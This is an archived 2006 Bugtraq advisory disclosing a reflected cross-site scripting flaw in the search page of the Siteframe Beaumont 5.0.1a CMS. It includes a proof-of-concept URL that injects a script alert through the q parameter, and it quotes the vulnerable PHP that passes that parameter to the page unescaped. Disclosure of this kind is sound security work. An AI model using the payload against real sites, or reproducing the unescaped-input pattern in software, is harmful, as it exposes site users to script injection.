lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20060212184626.23885.qmail@securityfocus.com>
Date: 12 Feb 2006 18:46:26 -0000
From: federico.alice@...cali.it
To: bugtraq@...urityfocus.com
Subject: Siteframe Beaumont 5.0.1a  <== Cross-Site Scripting Vulnerability


Hi,
I'm Kiki and I would signal you a XSS in the CMS Siteframe Beaumont 5.0.1a
I enclose the advisory and the origina is here:
http://kiki91.altervista.org/exploit/siteframe5.0.1a_xss.txt
Bye bye

Kiki

p.s: sorry for my bad English but I'm Italian ;) 

Advisory:

Siteframe Beaumont 5.0.1a  <== Cross-Site Scripting Vulnerability

##########################

Information of Software:

Software: Siteframe Beaumont 5.0.1a  
Site: http://www.siteframe.org/
Description of software: Siteframe is a lightweight content-management 
system designed for the rapid deployment of community-based websites. 
With Siteframe,a group of users can share stories and photographs, create blogs, 
send email to one another, and participate in group activities.

##########################

Bug: 

Siteframe contains a flaw that allows a remote cross site scripting attack. 
The vulnerability is found in the search page and the user can modify the 
function GET and insert the XSS code.

- http get request

http://[target]/search.php?q=casa
GET /search.php?q=casa
Host: siteframe.org
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; it-IT; rv:1.7.12) Gecko/20050919 Firefox/1.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: it,it-it;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive

but we can modify the request GET in this way:

http://[target]/search.php?q=[XSS]
GET /search.php?q=[XSS]

-------------------------

Example:

http://[target]/search.php?q=[XSS]

or a practical example:

http://[target]/search.php?q=<script>alert("lol");</script>

-------------------------

The bug is in this part of code of search.php :

[.....]
if (isset($_GET['q']))
{
    $PAGE->assign('page_title', lang('page_title_search_results'));

    $pattern = $_GET['q'];
    $PAGE->assign('search_string', $_GET['q']);

    // build query
    $stext = new SearchText;
    $q = sprintf(
            $__QUERY, 
            addslashes($_GET['q']),
            $stext->table_name(),
            addslashes($_GET['q'])
    );
    
    $PAGE->assign('sql_query', $q);
[.....]

##########################

Credit:

Author:  Kiki
e-mail: federico.sana@...ce.it
web page: http://www.kiki91.altervista.org

##########################





Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ